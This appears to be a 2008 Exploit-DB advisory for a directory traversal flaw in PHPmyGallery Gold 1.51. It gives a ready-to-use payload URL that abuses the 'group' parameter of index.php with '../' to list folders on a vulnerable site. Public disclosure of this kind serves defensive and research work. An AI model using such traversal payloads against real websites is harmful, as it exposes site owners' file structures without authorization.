PHPmyGallery Gold 1.51 - 'index.php' Directory Traversal

EDB-ID:

7377

Author:

zAx

Type:

webapps

Platform:

PHP

Published:

2008-12-07

            ############### Yee7.Com ###############
             ############### zAx #################
        PHPmyGallery Gold 1.51 (index.php) Folders Disclosure
 -----------------------------------------------------------------------------------------------------------

 [+] Script        : PHPmyGallery Gold 1.51
 [+] Vuln.          : Folders Disclosure
 [+] Download :http://phpmygallery.kapierich.net/en/downloads/
 [+] Discovered By  :         zAx [ThE-zAx@Hotmail.Com]
 [+] Team:  Electronic Security Team (Yee7.Com)

Exploit : http://site/phpmygallery/index.php?group=../somefolder

 [+]Somefolder is any folder in the vulnerable website
 [+] ../ = Up from this folder
 [+] You can see all folders those are in "somefolder"


[+] Important : This vulnerability is Discovered By Yee7-Team, By [ zAx ] and [ ShockShadow ]

# milw0rm.com [2008-12-07]